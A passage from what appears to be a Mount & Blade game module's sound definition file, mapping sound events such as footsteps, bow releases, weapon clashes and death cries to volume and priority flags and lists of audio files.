sf_vol_4|sf_priority_2,["weapon_swing_01.wav","weapon_swing_02.wav","weapon_swing_03.wav","weapon_swing_04.wav","weapon_swing_05.wav","weapon_swing_06.wav","weapon_swing_07.wav","weapon_swing_08.wav","weapon_swing_09.wav","weapon_swing_10.wav","swoosh_01.wav","swoosh_02.wav","swoosh_03.wav","swoosh_04.wav","swoosh_05.wav","swoosh_06.wav","swoosh_07.wav","swoosh_08.wav","swoosh_09.wav","swoosh_10.wav"]), ("footstep_grass", sf_vol_13|sf_priority_1,["footstep_grass_light_01.wav","footstep_grass_light_02.wav","footstep_grass_light_03.wav","footstep_grass_light_04.wav","footstep_grass_light_05.wav","footstep_grass_light_06.wav","footstep_grass_light_07.wav","footstep_grass_light_08.wav","footstep_grass_light_09.wav","footstep_grass_light_10.wav","footstep_grass_light_11.wav","footstep_grass_light_12.wav","footstep_grass_light_13.wav","footstep_grass_light_14.wav","footstep_grass_light_15.wav"]), ("footstep_wood", sf_vol_15|sf_priority_1,["footstep_wood_light_01.wav","footstep_wood_light_02.wav","footstep_wood_light_03.wav","footstep_wood_light_04.wav","footstep_wood_light_05.wav","footstep_wood_light_06.wav","footstep_wood_light_07.wav","footstep_wood_light_08.wav","footstep_wood_light_09.wav","footstep_wood_light_10.wav"]), # ("footstep_wood", sf_vol_3|sf_priority_1,["footstep_stone_1.wav","footstep_stone_3.wav","footstep_stone_4.wav"]), ("footstep_water", sf_vol_13|sf_priority_3,["footstep_water_01.wav","footstep_water_02.wav","footstep_water_03.wav","footstep_water_04.wav","footstep_water_05.wav","footstep_water_06.wav","footstep_water_07.wav","footstep_water_08.wav","footstep_water_09.wav","footstep_water_10.wav","Water_SSplash_01.wav","Water_SSplash_08.wav","Water_SSplash_09.wav","Water_SSplash_10.wav","Water_SSplash_12.wav"]), ("footstep_horse",sf_priority_3|sf_vol_15, ["footstep_horse_5.ogg","footstep_horse_2.ogg","footstep_horse_3.ogg","footstep_horse_4.ogg"]), # ("footstep_horse",0, ["s_footstep_horse_4b.wav","s_footstep_horse_4f.wav","s_footstep_horse_5b.wav","s_footstep_horse_5f.wav"]), ("footstep_horse_1b",sf_priority_3|sf_vol_15, ["s_footstep_horse_4b.ogg","s_footstep_horse_4f.ogg","s_footstep_horse_5b.ogg","s_footstep_horse_5f.ogg"]), ("footstep_horse_1f",sf_priority_3|sf_vol_15, ["s_footstep_horse_2b.ogg","s_footstep_horse_2f.ogg","s_footstep_horse_3b.ogg","s_footstep_horse_3f.ogg"]), # ("footstep_horse_1f",sf_priority_3|sf_vol_15, ["footstep_horse_5.wav","footstep_horse_2.wav","footstep_horse_3.wav","footstep_horse_4.wav"]), ("footstep_horse_2b",sf_priority_3|sf_vol_15, ["s_footstep_horse_2b.ogg"]), ("footstep_horse_2f",sf_priority_3|sf_vol_15, ["s_footstep_horse_2f.ogg"]), ("footstep_horse_3b",sf_priority_3|sf_vol_15, ["s_footstep_horse_3b.ogg"]), ("footstep_horse_3f",sf_priority_3|sf_vol_15, ["s_footstep_horse_3f.ogg"]), ("footstep_horse_4b",sf_priority_3|sf_vol_15, ["s_footstep_horse_4b.ogg"]), ("footstep_horse_4f",sf_priority_3|sf_vol_15, ["s_footstep_horse_4f.ogg"]), ("footstep_horse_5b",sf_priority_3|sf_vol_15, ["s_footstep_horse_5b.ogg"]), ("footstep_horse_5f",sf_priority_3|sf_vol_15, ["s_footstep_horse_5f.ogg"]), ("jump_begin", sf_vol_7|sf_priority_9,["jump_light_b_01.wav","jump_light_b_02.wav","jump_light_b_03.wav"]), ("jump_end", sf_vol_5|sf_priority_9,["jump_light_e_01.wav","jump_light_e_02.wav"]), ("jump_begin_water", sf_vol_9|sf_priority_9,["water_jump_01.wav","water_jump_02.wav","water_jump_03.wav"]), ("jump_end_water", sf_vol_8|sf_priority_9,["water_splash_01.wav","water_splash_02.wav","water_splash_03.wav","water_splash_04.wav","water_splash_05.wav"]), ("horse_jump_begin", sf_vol_10|sf_priority_9,["horse_jump_b_01.wav","horse_jump_b_02.wav"]), ("horse_jump_end", sf_vol_10|sf_priority_9,["horse_jump_e_01.wav","horse_jump_e_02.wav"]), ("horse_jump_begin_water", sf_vol_10|sf_priority_9,["water_jump_large_01.wav","water_jump_large_02.wav","water_jump_large_03.wav"]), ("horse_jump_end_water", sf_vol_10|sf_priority_9,["water_splash_large_01.wav","water_splash_large_02.wav","water_splash_large_03.wav","water_splash_large_04.wav","water_splash_large_05.wav"]), ("release_bow",sf_vol_5, ["bow_shoot_01.wav","bow_shoot_02.wav","bow_shoot_03.wav","bow_shoot_04.wav","bow_shoot_05.wav","bow_shoot_06.wav","bow_shoot_07.wav","bow_shoot_08.wav","bow_shoot_09.wav","bow_shoot_10.wav"]), ("release_crossbow",sf_vol_7, ["crossbow_shoot_01.wav","crossbow_shoot_02.wav","crossbow_shoot_03.wav","crossbow_shoot_04.wav","crossbow_shoot_05.wav","crossbow_shoot_06.wav", "Crossbow_Fire_07.wav", "Crossbow_Fire_08.wav", "Crossbow_Fire_10.wav", "Crossbow_Fire_11.wav", "Crossbow_Fire_12.wav", "Crossbow_Fire_13.wav", "Crossbow_Fire_14.wav", "Crossbow_Fire_15.wav"]), ("throw_javelin",sf_vol_5, ["throw_javelin_01.wav","throw_javelin_02.wav","throw_javelin_03.wav"]), ("throw_axe",sf_vol_7, ["throw_axe_1.ogg"]), ("throw_knife",sf_vol_5, ["throw_knife_01.wav","throw_knife_02.wav","throw_knife_03.wav","throw_knife_04.wav"]), ("throw_stone",sf_vol_5, ["throw_stone_01.wav","throw_stone_02.wav","throw_stone_03.wav"]), ("reload_crossbow",sf_vol_3, ["pull_crossbow_string_01.wav","pull_crossbow_string_02.wav","pull_crossbow_string_03.wav","pull_crossbow_string_04.wav","pull_crossbow_string_05.wav"]), ("reload_crossbow_continue",sf_vol_6, ["put_back_dagger.ogg"]), ("pull_bow",sf_vol_10, ["pull_bow_string_01.wav","pull_bow_string_02.wav","pull_bow_string_03.wav","pull_bow_string_04.wav","pull_bow_string_05.wav"]), ("pull_arrow",sf_vol_5, ["draw_arrow_01.wav","draw_arrow_02.wav","draw_arrow_03.wav"]), ("arrow_pass_by",sf_priority_7|sf_vol_4, ["arrow_pass_01.wav","arrow_pass_02.wav","arrow_pass_03.wav","arrow_pass_04.wav","arrow_pass_05.wav","arrow_pass_06.wav","arrow_pass_07.wav","arrow_pass_08.wav","arrow_pass_09.wav","arrow_pass_10.wav","arrow_fly_01.wav","arrow_fly_02.wav","arrow_fly_03.wav","arrow_fly_04.wav","arrow_fly_05.wav","arrow_fly_06.wav","arrow_fly_08.wav","arrow_fly_10.wav","arrow_fly_11.wav","arrow_fly_12.wav","arrow_fly_13.wav","arrow_fly_14.wav","arrow_fly_15.wav","arrow_fly_16.wav","arrow_fly_17.wav","arrow_fly_18.wav","arrow_fly_19.wav","arrow_fly_20.wav"]), ("bolt_pass_by",sf_priority_7|sf_vol_4, ["bolt_pass_01.wav","bolt_pass_02.wav","bolt_pass_03.wav","bolt_pass_04.wav","bolt_pass_05.wav","bolt_pass_06.wav","bolt_pass_07.wav","bolt_pass_08.wav", "crossbow_fly_09.wav", "crossbow_fly_10.wav", "crossbow_fly_11.wav", "crossbow_fly_12.wav", "crossbow_fly_13.wav", "crossbow_fly_14.wav", "crossbow_fly_15.wav"]), ("javelin_pass_by",sf_priority_7, ["javelin_pass_by_1.ogg","javelin_pass_by_2.ogg"]), ("stone_pass_by",sf_vol_9|sf_priority_7, ["stone_pass_01.wav","stone_pass_02.wav","stone_pass_03.wav"]), ("axe_pass_by",sf_priority_7, ["axe_pass_by_1.ogg"]), ("knife_pass_by",sf_priority_7, ["knife_pass_01.wav","knife_pass_02.wav","knife_pass_03.wav","knife_pass_04.wav"]), #("bullet_pass_by",sf_priority_7, ["bullet_pass_01.wav","bullet_pass_02.wav","bullet_pass_03.wav","bullet_pass_04.wav","bullet_pass_05.wav","bullet_pass_06.wav","bullet_pass_07.wav","bullet_pass_08.wav","bullet_pass_09.wav","bullet_pass_10.wav","bullet_pass_11.wav","bullet_pass_12.wav"]), ("incoming_arrow_hit_ground",sf_priority_7|sf_vol_14, ["arrow_ground_01.wav","arrow_ground_02.wav","arrow_ground_03.wav","arrow_ground_04.wav","arrow_ground_05.wav","arrow_ground_06.wav","arrow_ground_07.wav","arrow_ground_08.wav"]), ("incoming_bolt_hit_ground",sf_priority_7|sf_vol_14, ["bolt_ground_01.wav","bolt_ground_02.wav","bolt_ground_03.wav","bolt_ground_04.wav","bolt_ground_05.wav","bolt_ground_06.wav","bolt_ground_07.wav","bolt_ground_08.wav"]), ("incoming_javelin_hit_ground",sf_priority_7|sf_vol_14, ["javelin_ground_01.wav","javelin_ground_02.wav","javelin_ground_03.wav"]), ("incoming_stone_hit_ground",sf_priority_7|sf_vol_14, ["stone_ground_01.wav","stone_ground_02.wav","stone_ground_03.wav"]), ("incoming_axe_hit_ground",sf_priority_7|sf_vol_14, ["axe_ground_01.wav","axe_ground_02.wav","axe_ground_03.wav"]), ("incoming_knife_hit_ground",sf_priority_7|sf_vol_14, ["knife_ground_01.wav","knife_ground_02.wav","knife_ground_03.wav"]), #("incoming_bullet_hit_ground",sf_priority_7|sf_vol_14, ["bullet_ric_01.wav","bullet_ric_02.wav","bullet_ric_03.wav","bullet_ric_04.wav","bullet_ric_05.wav","bullet_ric_06.wav","bullet_ric_07.wav","bullet_ric_08.wav"]), ("outgoing_arrow_hit_ground",sf_priority_7|sf_vol_14, ["arrow_ground_01.wav","arrow_ground_02.wav","arrow_ground_03.wav","arrow_ground_04.wav","arrow_ground_05.wav","arrow_ground_06.wav","arrow_ground_07.wav","arrow_ground_08.wav"]), ("outgoing_bolt_hit_ground",sf_priority_7|sf_vol_14, ["bolt_ground_01.wav","bolt_ground_02.wav","bolt_ground_03.wav","bolt_ground_04.wav","bolt_ground_05.wav","bolt_ground_06.wav","bolt_ground_07.wav","bolt_ground_08.wav"]), ("outgoing_javelin_hit_ground",sf_priority_7|sf_vol_15, ["javelin_ground_01.wav","javelin_ground_02.wav","javelin_ground_03.wav"]), ("outgoing_stone_hit_ground",sf_priority_7|sf_vol_14, ["stone_ground_01.wav","stone_ground_02.wav","stone_ground_03.wav"]), ("outgoing_axe_hit_ground",sf_priority_7|sf_vol_14, ["axe_ground_01.wav","axe_ground_02.wav","axe_ground_03.wav"]), ("outgoing_knife_hit_ground",sf_priority_7|sf_vol_14, ["knife_ground_01.wav","knife_ground_02.wav","knife_ground_03.wav"]), #("outgoing_bullet_hit_ground",sf_priority_7|sf_vol_14, ["bullet_ric_01.wav","bullet_ric_02.wav","bullet_ric_03.wav","bullet_ric_04.wav","bullet_ric_05.wav","bullet_ric_06.wav","bullet_ric_07.wav","bullet_ric_08.wav"]), ("draw_sword",sf_priority_2, ["draw_sword_02.wav","draw_sword_03.wav"]), ("put_back_sword",sf_priority_1, ["put_away_sword_01.wav"]), ("draw_greatsword",sf_priority_2, ["draw_greatsword_01.wav","draw_greatsword_03.wav"]), ("put_back_greatsword",sf_priority_1, ["put_away_greatsword_01.wav"]), ("draw_axe",sf_priority_2, ["draw_axe_01.wav","draw_axe_02.wav"]), ("put_back_axe",sf_priority_1, ["put_away_axe_01.wav"]), ("draw_greataxe",sf_priority_2, ["draw_greataxe_01.wav","draw_greataxe_02.wav"]), ("put_back_greataxe",sf_priority_1, ["put_away_greataxe_01.wav"]), ("draw_spear",sf_priority_2, ["draw_spear_01.wav","draw_spear_02.wav"]), ("put_back_spear",sf_priority_1, ["put_away_spear_01.wav"]), ("draw_crossbow",sf_priority_2|sf_vol_6, ["draw_crossbow_01.wav","draw_crossbow_02.wav"]), ("put_back_crossbow",sf_priority_1, ["put_away_crossbow_01.wav"]), ("draw_revolver",sf_priority_2, ["draw_from_holster.ogg"]), ("put_back_revolver",sf_priority_1, ["put_back_to_holster.ogg"]), ("draw_dagger",sf_priority_2, ["draw_dagger_01.wav","draw_dagger_02.wav"]), ("put_back_dagger",sf_priority_1, ["put_away_dagger_01.wav"]), ("draw_bow",sf_priority_2, ["draw_bow_01.wav","draw_bow_02.wav"]), ("put_back_bow",sf_priority_1, ["put_away_bow_01.wav"]), ("draw_shield",sf_priority_2|sf_vol_7, ["draw_shield_01.wav","draw_shield_02.wav"]), ("put_back_shield",sf_priority_1|sf_vol_7, ["put_away_shield_01.wav"]), ("draw_other",sf_priority_2, ["draw_other.ogg"]), ("put_back_other",sf_priority_1, ["draw_other2.ogg"]), ("body_fall_small",sf_priority_5|sf_vol_10, ["body_fall_small_01.wav","body_fall_small_02.wav","body_fall_small_03.wav","body_fall_small_04.wav","body_fall_small_05.wav","body_fall_small_06.wav","body_fall_small_07.wav","body_fall_small_08.wav", "Fall_Infantry_Grass_07.wav", "Fall_Infantry_Snow_01.wav", "Fall_Infantry_Snow_02.wav", "Fall_Infantry_Snow_03.wav"]), ("body_fall_big",sf_priority_6|sf_vol_10, ["body_fall_large_01.wav","body_fall_large_02.wav","body_fall_large_03.wav","body_fall_large_04.wav","body_fall_large_05.wav","body_fall_large_06.wav","body_fall_large_07.wav","body_fall_large_08.wav", "Fall_Infantry_Grass_03.wav", "Fall_Infantry_Grass_04.wav", "Fall_Infantry_Grass_05.wav", "Fall_Infantry_Grass_06.wav"]), # ("body_fall_very_big",sf_priority_9|sf_vol_10, ["body_fall_very_big_1.wav"]), ("horse_body_fall_begin",sf_priority_6|sf_vol_10, ["horse_fall_b_01.wav","horse_fall_b_02.wav","horse_fall_b_03.wav"]), ("horse_body_fall_end",sf_priority_6|sf_vol_10, ["horse_fall_e_01.wav","horse_fall_e_02.wav","horse_fall_e_03.wav", "Fall_horse_grass_01.wav","Fall_horse_grass_02.wav","Fall_horse_grass_05.wav"]), ## ("clang_metal",sf_priority_9, ["clang_metal_1.ogg","clang_metal_2.ogg","s_swordClash1.wav","s_swordClash2.wav","s_swordClash3.wav"]), ("hit_wood_wood",sf_priority_7|sf_vol_10, ["wpn_impact_blunt2hand_wood_01.ogg", "wpn_impact_blunt2hand_wood_02.ogg", "wpn_impact_blunt2hand_wood_03.ogg", "wpn_impact_blunt_wood_01.ogg", "wpn_impact_blunt_wood_02.ogg", "wpn_impact_blunt_wood_03.ogg","wood_on_wood_01.wav","wood_on_wood_02.wav","wood_on_wood_03.wav","wood_on_wood_04.wav","wood_on_wood_05.wav","wood_on_wood_06.wav","wood_on_wood_07.wav","wood_on_wood_08.wav"]),#dummy ("hit_metal_metal",sf_priority_7|sf_vol_9, ["swordclash_01.ogg", "swordclash_02.ogg", "swordclash_03.ogg", "swordclash_04.ogg", "swordclash_05.ogg", "swordclash_06.ogg", "swordclash_07.ogg", "swordclash_08.ogg", "wpn_bash_blade_01.ogg", "wpn_bash_blade_02.ogg","Sword_clash_01.wav","Sword_clash_02.wav","Sword_clash_03.wav","Sword_clash_04.wav","Sword_clash_05.wav","Sword_clash_06.wav","Sword_clash_07.wav","Sword_clash_08.wav","Sword_clash_09.wav","Sword_clash_10.wav","Sword_clash_11.wav","Sword_clash_12.wav","Sword_clash_13.wav","Sword_clash_14.wav","Sword_clash_15.wav"]), ("hit_wood_metal",sf_priority_7|sf_vol_10, ["fx_melee_sword_wood_02.ogg", "fx_melee_sword_wood_01.ogg","metal_on_wood_01.wav","metal_on_wood_02.wav","metal_on_wood_03.wav","metal_on_wood_04.wav","metal_on_wood_05.wav","metal_on_wood_06.wav","metal_on_wood_07.wav","metal_on_wood_08.wav","metal_on_wood_09.wav","metal_on_wood_10.wav"]), # ("clang_metal", sf_priority_9,["sword_clank_metal_09.wav","sword_clank_metal_10.wav","sword_clank_metal_12.wav","sword_clank_metal_13.wav"]), ## ("shield_hit_cut",sf_priority_5, ["shield_hit_cut_3.wav","shield_hit_cut_4.wav","shield_hit_cut_5.wav"]), # ("clang_metal", sf_priority_9,["sword_clank_metal_09.ogg","sword_clank_metal_10.ogg","sword_clank_metal_12.ogg","sword_clank_metal_13.ogg"]), ## ("shield_hit_cut",sf_priority_5, ["shield_hit_cut_3.ogg","shield_hit_cut_4.ogg","shield_hit_cut_5.ogg"]), ("shield_hit_wood_wood",sf_priority_7|sf_vol_10, ["wpn_bash_shield_light_01.ogg", "wpn_bash_shield_light_02.ogg","shield_wood_wood_01.wav","shield_wood_wood_02.wav","shield_wood_wood_03.wav","shield_wood_wood_04.wav","shield_wood_wood_05.wav","shield_wood_wood_06.wav","shield_wood_wood_07.wav","shield_wood_wood_08.wav","shield_wood_wood_09.wav","shield_wood_wood_10.wav","shield_wood_wood_11.wav","shield_wood_wood_12.wav"]), ("shield_hit_metal_metal",sf_priority_7|sf_vol_10, ["wpn_bash_shield_heavy_01.ogg", "wpn_bash_shield_heavy_02.ogg", "wpn_bash_shield_heavy_03.ogg", "wpn_impact_blade_metal_01.ogg","wpn_impact_blade_metal_02.ogg","wpn_impact_blade_metal_03.ogg","shield_metal_metal_01.wav","shield_metal_metal_02.wav","shield_metal_metal_03.wav","shield_metal_metal_04.wav","shield_metal_metal_05.wav","shield_metal_metal_06.wav","shield_metal_metal_07.wav","shield_metal_metal_08.wav","shield_metal_metal_09.wav","shield_metal_metal_10.wav","shield_metal_metal_11.wav","shield_metal_metal_12.wav"]), ("shield_hit_wood_metal",sf_priority_7|sf_vol_10, ["wpn_bash_bow_01.ogg", "wpn_bash_bow_02.ogg", "wpn_bash_bow_03.ogg", "fx_melee_metalimpactlarge_flesh_01.ogg", "fx_melee_metalimpactlarge_flesh_02.ogg", "shield_metal_wood_01.wav","shield_metal_wood_02.wav","shield_metal_wood_03.wav","shield_metal_wood_04.wav","shield_metal_wood_05.wav","shield_metal_wood_06.wav","shield_metal_wood_07.wav","shield_metal_wood_08.wav","shield_metal_wood_09.wav","shield_metal_wood_10.wav"]), #(shield is wood) ("shield_hit_metal_wood",sf_priority_7|sf_vol_10, ["wpn_bash_shield_light_02.ogg","wpn_bash_shield_light_01.ogg","shield_wood_metal_01.wav","shield_wood_metal_02.wav","shield_wood_metal_03.wav","shield_wood_metal_04.wav","shield_wood_metal_05.wav","shield_wood_metal_06.wav","shield_wood_metal_07.wav","shield_wood_metal_08.wav"]),#(shield is metal) ("shield_broken",sf_priority_9, ["obj_cwbarricade_destroyed.ogg","shield_break_01.wav","shield_break_02.wav"]), ("man_hit",sf_priority_7|sf_vol_7, ["man_hit_5.ogg","man_hit_6.ogg","man_hit_7.ogg","man_hit_8.ogg","man_hit_9.ogg","man_hit_10.ogg","man_hit_11.ogg","man_hit_12.ogg","man_hit_13.ogg","man_hit_14.ogg","man_hit_15.ogg","man_hit_17.ogg","man_hit_18.ogg","man_hit_19.ogg","man_hit_22.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg","man_hit_59.ogg"]), #Disabled due to no sounds("man_hit",sf_priority_7|sf_vol_10, ["man_grunt_pain_01.wav","man_grunt_pain_02.wav","man_grunt_pain_03.wav","man_grunt_pain_04.wav","man_grunt_pain_05.wav","man_grunt_pain_06.wav","man_grunt_pain_07.wav","man_grunt_pain_08.wav","man_grunt_pain_09.wav","man_grunt_pain_10.wav","man_grunt_pain_11.wav","man_grunt_pain_12.wav","man_grunt_pain_13.wav","man_grunt_pain_14.wav","man_grunt_pain_15.wav","man_grunt_pain_16.wav","man_grunt_pain_17.wav","man_grunt_pain_18.wav","man_grunt_pain_19.wav","man_grunt_pain_20.wav"]), ("man_die",sf_priority_10|sf_vol_10, ["man_die_01.ogg","man_die_02.ogg","man_die_03.ogg","man_die_04.ogg","man_die_05.ogg","man_die_06.ogg","man_die_07.ogg","man_die_08.ogg","man_die_09.ogg","man_die_10.ogg","man_die_11.ogg","man_die_12.ogg","man_die_13.ogg","man_die_14.ogg","man_die_15.ogg","man_die_16.ogg","man_die_17.ogg","man_die_18.ogg","man_die_19.ogg","man_die_20.ogg","man_die_21.ogg","man_die_22.ogg","man_die_23.ogg","man_die_24.ogg","man_die_25.ogg","man_die_26.ogg","man_die_27.ogg","man_die_28.ogg","man_die_29.ogg","man_die_30.ogg","man_die_31.ogg","man_die_32.ogg"]), ("woman_hit",sf_priority_7, ["woman_hit_2.ogg","woman_hit_3.ogg","woman_hit_b_2.ogg","woman_hit_b_4.ogg","woman_hit_b_6.ogg","woman_hit_b_7.ogg","woman_hit_b_8.ogg","woman_hit_b_11.ogg","woman_hit_b_14.ogg","woman_hit_b_16.ogg"]), #("woman_die",sf_priority_10, ["woman_fall_1.ogg","woman_hit_b_5.ogg", "Death_Hit_01.mp3", "Death_Hit_02.mp3", "Death_Hit_03.mp3", "Death_Hit_04.mp3", "Death_Hit_05.mp3", "Death_Hit_06.mp3", "Death_Hit_07.mp3", "Death_Hit_08.mp3", "Death_Hit_09.mp3", "Death_Hits_01.mp3", "Death_Hits_02.mp3", "Death_Hits_03.mp3", "Death_Hits_04.mp3", "Death_Hits_05.mp3"]), ("woman_die",sf_priority_10, ["woman_fall_1.ogg","woman_hit_b_5.ogg"]), ("woman_yell",sf_priority_8|sf_vol_10, ["woman_yell_1.ogg","woman_yell_2.ogg"]), ("hide",0, ["s_hide.wav"]), ("unhide",0, ["s_unhide.wav"]), ("neigh",0, ["horse_exterior_whinny_01.ogg","horse_exterior_whinny_02.ogg","horse_exterior_whinny_03.ogg","horse_exterior_whinny_04.ogg","horse_exterior_whinny_05.ogg","horse_whinny.ogg"]), ("gallop",sf_vol_3, ["horse_gallop_04.wav","horse_gallop_05.wav","horse_gallop_06.wav"]), ("battle",sf_vol_4, ["Group_Fight_Medium.wav", "Group_Fight_Small.wav"]), # ("bow_shoot_player",sf_priority_10|sf_vol_10, ["bow_shoot_4.ogg"]), # ("bow_shoot",sf_priority_4, ["bow_shoot_4.ogg"]), # ("crossbow_shoot",sf_priority_4, ["bow_shoot_2.ogg"]), ("arrow_hit_body",sf_priority_4, ["missile_flesh_01.wav","missile_flesh_02.wav","missile_flesh_03.wav","missile_flesh_04.wav","missile_flesh_05.wav","missile_flesh_06.wav","missile_flesh_07.wav","missile_flesh_08.wav","Arrow_Hit_flesh_01.wav","Arrow_Hit_flesh_02.wav","Arrow_Hit_flesh_03.wav","Arrow_Hit_flesh_04.wav","Arrow_Hit_flesh_05.wav","Arrow_Hit_flesh_06.wav","Arrow_Hit_flesh_07.wav","Arrow_Hit_flesh_08.wav","Arrow_Hit_flesh_09.wav","Arrow_Hit_flesh_10.wav","Arrow_Hit_flesh_11.wav","Arrow_Hit_flesh_12.wav","Arrow_Hit_flesh_13.wav","Arrow_Hit_flesh_14.wav","Arrow_Hit_flesh_15.wav","Arrow_Hit_flesh_16.wav","Arrow_Hit_flesh_17.wav"]), ("metal_hit_low_armor_low_damage",sf_priority_5|sf_vol_9, ["metal_low_low_01.wav","metal_low_low_02.wav","metal_low_low_03.wav","metal_low_low_04.wav","metal_low_low_05.wav","metal_low_low_06.wav","metal_low_low_07.wav","metal_low_low_08.wav"]), ("metal_hit_low_armor_high_damage",sf_priority_5|sf_vol_10, ["metal_low_high_01.wav","metal_low_high_02.wav","metal_low_high_03.wav","metal_low_high_04.wav","metal_low_high_05.wav","metal_low_high_06.wav","metal_low_high_07.wav","metal_low_high_08.wav","metal_low_high_09.wav","sword_flesh_hit_01.wav","sword_flesh_hit_02.wav","sword_flesh_hit_03.wav","sword_flesh_hit_04.wav","sword_flesh_hit_05.wav","sword_flesh_hit_07.wav","sword_flesh_hit_08.wav","sword_flesh_hit_09.wav","sword_flesh_hit_10.wav","sword_flesh_hit_11.wav","sword_flesh_hit_12.wav","sword_flesh_hit_13.wav","sword_flesh_hit_14.wav","sword_flesh_hit_15.wav","sword_flesh_hit_16.wav","sword_flesh_hit_17.wav","sword_flesh_hit_18.wav"]), ("metal_hit_high_armor_low_damage",sf_priority_5|sf_vol_9, ["metal_high_low_01.wav","metal_high_low_02.wav","metal_high_low_03.wav","metal_high_low_04.wav","metal_high_low_05.wav","metal_high_low_06.wav","metal_high_low_07.wav","metal_high_low_08.wav","metal_high_low_09.wav","metal_high_low_10.wav","metal_high_low_11.wav","metal_high_low_12.wav","metal_high_low_13.wav","metal_high_low_14.wav","metal_high_low_15.wav","metal_high_low_16.wav","metal_high_low_17.wav","metal_high_low_18.wav","metal_high_low_19.wav","metal_high_low_20.wav","metal_high_low_21.wav","metal_high_low_22.wav","metal_high_low_23.wav","metal_high_low_24.wav","metal_high_low_25.wav"]), ("metal_hit_high_armor_high_damage",sf_priority_5|sf_vol_9, ["metal_high_high_01.wav","metal_high_high_02.wav","metal_high_high_03.wav","metal_high_high_04.wav","metal_high_high_05.wav","metal_high_high_06.wav","metal_high_high_07.wav","metal_high_high_08.wav","metal_high_high_09.wav","metal_high_high_10.wav","metal_high_high_11.wav","metal_high_high_12.wav","metal_high_high_13.wav","metal_high_high_14.wav","metal_high_high_15.wav","metal_high_high_16.wav","metal_high_high_17.wav","metal_high_high_18.wav","metal_high_high_19.wav","metal_high_high_20.wav","metal_high_high_21.wav","metal_high_high_22.wav","metal_high_high_23.wav","metal_high_high_24.wav","metal_high_high_25.wav","metal_high_high_26.wav","metal_high_high_27.wav","metal_high_high_28.wav","metal_high_high_29.wav","metal_high_high_30.wav","metal_high_high_31.wav","metal_high_high_32.wav"]), ("wooden_hit_low_armor_low_damage",sf_priority_5|sf_vol_9, ["blunt_low_low_01.wav","blunt_low_low_02.wav","blunt_low_low_03.wav","blunt_low_low_04.wav","blunt_low_low_05.wav","blunt_low_low_06.wav","blunt_low_low_07.wav","blunt_low_low_08.wav","blunt_low_low_09.wav","blunt_low_low_10.wav"]), ("wooden_hit_low_armor_high_damage",sf_priority_5|sf_vol_9, ["blunt_low_high_01.wav","blunt_low_high_02.wav","blunt_low_high_03.wav","blunt_low_high_04.wav","blunt_low_high_05.wav","blunt_low_high_06.wav","blunt_low_high_07.wav","blunt_low_high_08.wav","blunt_low_high_09.wav","blunt_low_high_10.wav","blunt_low_high_11.wav","blunt_low_high_12.wav","blunt_low_high_13.wav"]), ("wooden_hit_high_armor_low_damage",sf_priority_5|sf_vol_9, ["blunt_high_low_01.wav","blunt_high_low_02.wav","blunt_high_low_03.wav","blunt_high_low_04.wav","blunt_high_low_05.wav","blunt_high_low_06.wav","blunt_high_low_07.wav","blunt_high_low_08.wav","blunt_high_low_09.wav","blunt_high_low_10.wav"]), ("wooden_hit_high_armor_high_damage",sf_priority_5|sf_vol_9, ["blunt_high_high_01.wav","blunt_high_high_02.wav","blunt_high_high_03.wav","blunt_high_high_04.wav","blunt_high_high_05.wav","blunt_high_high_06.wav","blunt_high_high_07.wav","blunt_high_high_08.wav","blunt_high_high_09.wav","blunt_high_high_10.wav","blunt_high_high_11.wav","blunt_high_high_12.wav","blunt_high_high_13.wav","blunt_high_high_14.wav","blunt_high_high_15.wav","blunt_high_high_16.wav","blunt_high_high_17.wav","blunt_high_high_18.wav","blunt_high_high_19.wav","blunt_high_high_20.wav","blunt_high_high_21.wav","blunt_high_high_22.wav"]), ("mp_arrow_hit_target",sf_2d|sf_priority_15|sf_vol_9, ["mp_arrow_hit_target.wav"]), ("blunt_hit",sf_priority_5|sf_vol_10, ["fx_melee_punchmedium_01.ogg", "fx_melee_punchmedium_02.ogg", "fx_melee_punchmedium_03.ogg", "fx_melee_punchlarge_01.ogg", "fx_melee_punchlarge_02.ogg", "fx_melee_punchlarge_03.ogg","horse_charge_01.wav","horse_charge_02.wav","horse_charge_03.wav","horse_charge_04.wav","horse_charge_05.wav","horse_charge_06.wav","horse_charge_07.wav","horse_charge_08.wav"]), ("player_hit_by_arrow",sf_priority_10|sf_vol_10, ["player_hit_by_arrow.ogg"]), #("pistol_shot",sf_priority_10|sf_vol_10, ["gun_shoot_01.wav","gun_shoot_02.wav","gun_shoot_03.wav","gun_shoot_04.wav","gun_shoot_05.wav","gun_shoot_06.wav","gun_shoot_07.wav","gun_shoot_08.wav","gun_shoot_09.wav","gun_shoot_10.wav","gun_shoot_11.wav"]), #("man_grunt",sf_priority_6|sf_vol_4, ["man_ugh_01.wav","man_ugh_02.wav","man_ugh_03.wav","man_ugh_04.wav","man_ugh_05.wav","man_ugh_06.wav","man_ugh_07.wav","man_ugh_08.wav","man_ugh_09.wav","man_ugh_10.wav"]), #Not supposed to be used at all ("man_grunt", sf_priority_3|sf_vol_3, ["man_heavy_grunt_01.ogg", "man_heavy_grunt_02.ogg", "man_heavy_grunt_03.ogg", "man_heavy_grunt_04.ogg", "man_heavy_grunt_05.ogg", "man_heavy_grunt_06.ogg", "man_heavy_grunt_07.ogg", "man_heavy_grunt_08.ogg", "man_heavy_grunt_09.ogg", "man_heavy_grunt_10.ogg", "man_heavy_grunt_11.ogg", "man_heavy_grunt_12.ogg", "man_heavy_grunt_13.ogg", "man_heavy_grunt_14.ogg", "man_heavy_grunt_15.ogg"]), #Not supposed to be used at all ("man_breath_hard",sf_priority_3|sf_vol_8, ["man_ugh_01.wav","man_ugh_02.wav","man_ugh_03.wav","man_ugh_04.wav","man_ugh_05.wav","man_ugh_06.wav","man_ugh_07.wav","man_ugh_08.wav","man_ugh_09.wav","man_ugh_10.wav"]), ("man_stun",sf_priority_3|sf_vol_9, ["man_short_grunt_01.wav","man_short_grunt_02.wav"]), #OLD("man_grunt_long",sf_priority_6|sf_vol_8, 